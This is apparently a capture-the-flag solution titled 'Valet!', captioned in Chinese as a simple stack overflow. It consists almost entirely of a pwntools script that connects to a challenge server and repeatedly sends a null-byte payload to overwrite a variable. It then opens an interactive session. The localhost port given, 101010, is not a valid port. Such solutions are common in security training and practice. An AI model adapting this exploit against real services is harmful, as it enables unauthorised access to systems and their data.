Valet!
简单的栈溢出
#coding:utf8
from pwn import *
#sh = remote('111.198.29.45',43798)
sh = remote('127.0.0.1',101010)
def guess():
sh.sendlineafter('3. Quit','1')
#溢出,覆盖s
payload = 'aaa\x00aaa\x00'
sh.sendlineafter('Please enter your guess:',payload)
for i in range(20):
guess()
sh.sendlineafter('3. Quit','2')
sh.interactive()